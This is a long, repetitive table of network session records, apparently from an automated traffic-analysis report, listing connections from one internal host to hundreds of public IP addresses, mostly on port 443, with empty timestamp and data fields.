                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19945192.168.2.135163866.210.39.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19946192.168.2.1356074157.50.137.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19947192.168.2.13479528.60.171.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19948192.168.2.1355480172.79.66.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19949192.168.2.135881020.38.79.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19950192.168.2.1334760176.237.243.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19951192.168.2.1346886173.242.95.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19952192.168.2.135518270.71.159.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19953192.168.2.1343370219.228.40.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19954192.168.2.1358162213.21.160.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19955192.168.2.1336812156.209.162.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19956192.168.2.1344882191.153.251.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19957192.168.2.136008441.119.246.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19958192.168.2.1334718216.90.207.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19959192.168.2.1336544116.144.59.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19960192.168.2.1343706157.252.238.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19961192.168.2.13477869.51.139.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19962192.168.2.1353014195.211.158.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19963192.168.2.134186296.124.140.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19964192.168.2.1341278194.184.244.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19965192.168.2.1347414109.157.124.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19966192.168.2.1352436162.29.189.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19967192.168.2.133875045.164.136.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19968192.168.2.1352614163.130.139.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19969192.168.2.13435089.254.161.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19970192.168.2.1345590106.188.234.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19971192.168.2.1348260144.184.252.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19972192.168.2.136065047.22.144.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19973192.168.2.134135246.185.169.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19974192.168.2.1343668105.70.144.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19975192.168.2.1346734129.136.132.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19976192.168.2.133986890.250.108.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19977192.168.2.1341408218.11.0.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19978192.168.2.135345891.49.19.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19979192.168.2.135622476.96.209.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19980192.168.2.1346130141.108.76.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19981192.168.2.1347942213.110.241.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19982192.168.2.1339224172.226.255.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19983192.168.2.133574852.171.164.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19984192.168.2.1336390204.77.212.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19985192.168.2.1348182190.146.128.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19986192.168.2.1336432186.151.208.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19987192.168.2.1347062179.136.149.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19988192.168.2.1348792203.118.232.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19989192.168.2.134366247.19.142.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19990192.168.2.1351182221.64.50.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19991192.168.2.1342328131.174.119.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19992192.168.2.1354078220.239.7.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19993192.168.2.134004294.126.20.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19994192.168.2.1346150209.16.238.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19995192.168.2.1350298134.28.152.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19996192.168.2.1351508156.161.247.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19997192.168.2.134356893.146.164.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19998192.168.2.13558708.115.43.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19999192.168.2.1351830175.33.27.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20000192.168.2.1356364175.148.164.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20001192.168.2.1352618190.6.155.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20002192.168.2.135200659.128.106.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20003192.168.2.1341446218.185.121.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20004192.168.2.1335358169.3.227.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20005192.168.2.1352926115.216.145.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20006192.168.2.134939683.156.200.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20007192.168.2.13390804.120.123.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20008192.168.2.1332886109.194.122.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20009192.168.2.1340102196.221.43.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20010192.168.2.1354790140.13.227.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20011192.168.2.134902825.154.204.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20012192.168.2.1345354120.32.13.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20013192.168.2.1336440111.63.186.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20014192.168.2.1353776161.33.58.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20015192.168.2.1356600100.20.161.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20016192.168.2.13353064.215.112.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20017192.168.2.135019835.63.169.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20018192.168.2.1336738213.105.171.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20019192.168.2.1348184205.42.124.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20020192.168.2.1343504201.145.118.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20021192.168.2.1344598115.237.54.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20022192.168.2.134088438.63.101.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20023192.168.2.13567289.157.136.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20024192.168.2.133801254.199.99.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20025192.168.2.1349036175.222.141.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20026192.168.2.1348876185.84.113.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20027192.168.2.1342540135.200.133.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20028192.168.2.1335978118.52.15.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20029192.168.2.1344236144.218.181.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20030192.168.2.134171448.164.152.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20031192.168.2.1346710184.124.81.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20032192.168.2.1343260156.6.11.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20033192.168.2.133584642.186.37.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20034192.168.2.135352818.139.239.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20035192.168.2.1339850101.127.146.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20036192.168.2.1338020152.121.106.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20037192.168.2.134298865.220.165.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20038192.168.2.134841213.131.58.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20039192.168.2.1332780189.126.49.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20040192.168.2.1340488106.18.204.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20041192.168.2.135538447.155.23.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20042192.168.2.1338094148.151.135.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20043192.168.2.1352966119.227.234.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20044192.168.2.1350096149.170.3.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20045192.168.2.1349680171.194.73.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20046192.168.2.1340606113.78.59.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20047192.168.2.135658288.71.166.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20048192.168.2.1357816222.206.28.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20049192.168.2.133381836.28.39.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20050192.168.2.1347794193.209.130.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20051192.168.2.1337008220.31.11.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20052192.168.2.1338134139.161.51.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20053192.168.2.1348022205.122.0.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20054192.168.2.133569041.151.174.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20055192.168.2.135581869.147.91.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20056192.168.2.1351484170.131.212.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20057192.168.2.1360184157.14.64.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20058192.168.2.133973845.74.108.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20059192.168.2.135025070.83.7.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20060192.168.2.1358236139.160.158.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20061192.168.2.135080491.5.34.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20062192.168.2.134502439.164.56.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20063192.168.2.1348376190.234.12.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20064192.168.2.1351128153.240.230.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20065192.168.2.1345426173.81.105.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20066192.168.2.1352164111.162.150.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20067192.168.2.134491097.113.221.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20068192.168.2.133810667.107.158.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20069192.168.2.1346398192.156.113.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20070192.168.2.1358982213.56.169.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20071192.168.2.1342576130.9.131.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20072192.168.2.134962817.179.155.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20073192.168.2.1346192177.85.188.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20074192.168.2.133731023.196.75.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20075192.168.2.1354788193.255.221.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20076192.168.2.135516042.183.185.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20077192.168.2.135583089.84.71.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20078192.168.2.1344372205.48.11.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20079192.168.2.135112266.35.122.1058080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20080192.168.2.1356430176.179.103.1528080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20081192.168.2.1352682221.144.165.818080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20082192.168.2.1341442124.183.1.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20083192.168.2.1359300185.35.111.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20084192.168.2.135252835.63.170.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20085192.168.2.1342276102.61.231.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20086192.168.2.1333400196.192.218.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20087192.168.2.1358588184.254.97.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20088192.168.2.1342220113.21.84.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20089192.168.2.1353504134.193.204.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20090192.168.2.1342460184.158.199.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20091192.168.2.1341540148.252.234.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20092192.168.2.13565509.139.108.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20093192.168.2.134939238.210.8.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20094192.168.2.133318867.1.221.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20095192.168.2.1357300124.150.217.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20096192.168.2.1343238197.174.84.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20097192.168.2.134042046.154.172.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20098192.168.2.133676865.103.30.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20099192.168.2.1336258100.168.175.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20100192.168.2.135379090.120.4.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20101192.168.2.1342244211.251.96.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20102192.168.2.1353208164.110.113.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20103192.168.2.134234449.144.18.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20104192.168.2.1341898164.73.206.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20105192.168.2.134564481.207.96.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20106192.168.2.1359184182.198.43.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20107192.168.2.1345560113.163.28.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20108192.168.2.1357802222.101.208.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20109192.168.2.135496290.5.129.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20110192.168.2.1340840211.179.168.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20111192.168.2.135502425.13.222.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20112192.168.2.133540897.71.154.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20113192.168.2.133333458.193.194.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20114192.168.2.134208483.186.37.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20115192.168.2.135012294.229.87.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20116192.168.2.1334080176.238.21.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20117192.168.2.136070482.6.118.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20118192.168.2.134081613.28.85.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20119192.168.2.1344278136.234.166.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20120192.168.2.1334868178.24.181.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20121192.168.2.13380168.186.0.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20122192.168.2.1358386104.19.64.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20123192.168.2.1338702190.164.77.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20124192.168.2.133319653.154.28.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20125192.168.2.1351714126.227.150.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20126192.168.2.1335338186.243.106.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20127192.168.2.1333036179.187.29.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20128192.168.2.135648293.252.50.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20129192.168.2.1359128175.158.236.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20130192.168.2.1337482107.115.189.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20131192.168.2.1355452135.217.143.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20132192.168.2.134375296.226.201.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20133192.168.2.133515698.37.113.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20134192.168.2.134274699.178.223.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20135192.168.2.1357858195.24.184.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20136192.168.2.1358716197.206.93.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20137192.168.2.1359968151.217.114.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20138192.168.2.1360826158.17.203.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20139192.168.2.1339264203.97.138.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20140192.168.2.1360470125.147.2.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20141192.168.2.1351934179.48.140.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20142192.168.2.1351584103.192.189.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20143192.168.2.1348854137.195.19.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20144192.168.2.1351194105.132.123.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20145192.168.2.135511298.131.20.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20146192.168.2.13531804.241.211.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20147192.168.2.1350570181.96.60.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20148192.168.2.133752497.104.52.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20149192.168.2.1354210191.242.86.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20150192.168.2.1360458157.77.151.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20151192.168.2.1358068151.145.59.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20152192.168.2.134593880.186.228.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20153192.168.2.1355630108.139.235.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20154192.168.2.135287693.243.198.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20155192.168.2.133985443.247.8.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20156192.168.2.1350356164.82.82.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20157192.168.2.1352514149.230.76.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20158192.168.2.1336786185.101.29.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20159192.168.2.1359882103.136.1.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20160192.168.2.1354678164.3.13.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20161192.168.2.1340594197.201.219.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20162192.168.2.1346980137.80.123.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20163192.168.2.1349696119.169.211.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20164192.168.2.133292836.82.231.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20165192.168.2.1349890159.206.139.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20166192.168.2.1345138200.221.252.254443
